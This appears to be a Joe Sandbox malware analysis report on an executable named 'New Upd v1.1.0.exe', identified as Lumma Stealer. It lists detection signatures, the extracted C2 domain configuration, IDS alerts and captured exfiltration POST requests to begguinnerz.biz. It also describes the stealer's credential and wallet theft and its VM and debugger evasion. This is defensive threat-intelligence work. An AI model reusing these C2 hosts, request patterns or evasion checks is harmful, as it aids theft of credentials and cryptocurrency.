Edit tour

Windows Analysis Report
New Upd v1.1.0.exe

Overview

General Information

Sample name:	New Upd v1.1.0.exe
Analysis ID:	1581509
MD5:	3bdf3c4f1cfbb40a395ec5b10d97faf3
SHA1:	a8d14eccdc6693375a7e22d4cf8677c6a90f9ec4
SHA256:	a9748e3079e5e53cafe8a6251de92016f906d9e2c4e8d3835c641eb0de7c0edb
Tags:	exeLummaStealersigneduser-ventoy
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to retrieve information about pressed keystrokes

Detected potential crypto function

Entry point lies outside standard sections

Found evasive API chain (date check)

Found large amount of non-executed APIs

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

New Upd v1.1.0.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\New Upd v1.1.0.exe" MD5: 3BDF3C4F1CFBB40A395EC5B10D97FAF3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["inherineau.buzz", "screwamusresz.buzz", "cashfuzysao.buzz", "begguinnerz.biz", "hummskitnj.buzz", "rebuildeso.buzz", "scentniej.buzz", "prisonyfork.buzz", "appliacnesot.buzz"], "Build id": "HpOoIh--3fe7f419a360"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1888075525.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1957889164.0000000000B60000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4eace:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x52064:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: New Upd v1.1.0.exe PID: 7576	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: New Upd v1.1.0.exe PID: 7576	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: New Upd v1.1.0.exe PID: 7576	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T23:21:12.914580+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.92.91	443	TCP
2024-12-27T23:21:14.966012+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.92.91	443	TCP
2024-12-27T23:21:17.354345+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.92.91	443	TCP
2024-12-27T23:21:19.657247+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.92.91	443	TCP
2024-12-27T23:21:21.993137+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.92.91	443	TCP
2024-12-27T23:21:24.590051+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.92.91	443	TCP
2024-12-27T23:21:26.693770+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.92.91	443	TCP
2024-12-27T23:21:29.343796+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	104.21.92.91	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T23:21:13.648235+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	104.21.92.91	443	TCP
2024-12-27T23:21:15.745621+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	104.21.92.91	443	TCP
2024-12-27T23:21:30.111486+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49745	104.21.92.91	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T23:21:13.648235+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49737	104.21.92.91	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T23:21:15.745621+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49738	104.21.92.91	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T23:21:27.993028+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49744	104.21.92.91	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://begguinnerz.biz/pi	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz:443/apioQ	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/U	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/ym	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/apiam	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/An	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/1ner	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz:443/apin.txtPK	Avira URL Cloud: Label: malware
Source: begguinnerz.biz	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/api19	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/apis	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/pian	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/Qm	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/as	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/apill	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/api	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/piYn	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz:443/api	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz:443/apiLQ	Avira URL Cloud: Label: malware

Found malware configuration

Source: New Upd v1.1.0.exe.7576.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["inherineau.buzz", "screwamusresz.buzz", "cashfuzysao.buzz", "begguinnerz.biz", "hummskitnj.buzz", "rebuildeso.buzz", "scentniej.buzz", "prisonyfork.buzz", "appliacnesot.buzz"], "Build id": "HpOoIh--3fe7f419a360"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.2% probability

Source: New Upd v1.1.0.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49745 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49744 -> 104.21.92.91:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: begguinnerz.biz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.92.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.92.91:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HCC3PJ4LT1SPICR26User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18164Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PK480VEB774OH2B8VBQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8797Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=17SJPFTN8QWCKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20414Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PMPBSEGZ713PIJG3D2DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1267Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VSLUPTMYCJK38LQB5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1113Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: begguinnerz.biz

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: begguinnerz.biz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: begguinnerz.biz

Source: New Upd v1.1.0.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: New Upd v1.1.0.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: New Upd v1.1.0.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: New Upd v1.1.0.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: New Upd v1.1.0.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1957041720.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: New Upd v1.1.0.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: New Upd v1.1.0.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: New Upd v1.1.0.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: New Upd v1.1.0.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: New Upd v1.1.0.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: New Upd v1.1.0.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0
Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: New Upd v1.1.0.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: New Upd v1.1.0.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: New Upd v1.1.0.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: New Upd v1.1.0.exe	String found in binary or memory: http://ocsp.digicert.com0W
Source: New Upd v1.1.0.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: New Upd v1.1.0.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/
Source: New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/1ner
Source: New Upd v1.1.0.exe, 00000000.00000003.1888075525.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888266882.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/An
Source: New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/Qm
Source: New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/U
Source: New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/api
Source: New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/api19
Source: New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/apiam
Source: New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/apill
Source: New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/apis
Source: New Upd v1.1.0.exe, 00000000.00000003.1838881668.000000000399F000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1839511974.000000000399A000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838829498.000000000399C000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838777067.0000000003996000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1839281599.000000000399A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/as
Source: New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/pi
Source: New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/piYn
Source: New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/pian
Source: New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/ym
Source: New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz:443/api
Source: New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz:443/apiLQ
Source: New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz:443/apin.txtPK
Source: New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz:443/apioQ
Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
